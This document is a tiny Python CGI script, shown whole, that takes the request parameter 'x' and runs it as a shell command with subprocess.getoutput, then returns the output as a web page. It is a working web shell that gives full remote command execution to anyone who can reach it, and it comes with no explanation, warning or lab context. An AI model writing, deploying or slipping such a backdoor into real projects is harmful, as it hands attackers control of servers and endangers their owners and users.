#!/usr/bin/python3

import subprocess
import cgi
import readline

print("Content-Type: text/html")
print()

f = cgi.FieldStorage()
cmd = f.getvalue("x")
result = subprocess.getoutput(cmd)
print(result)
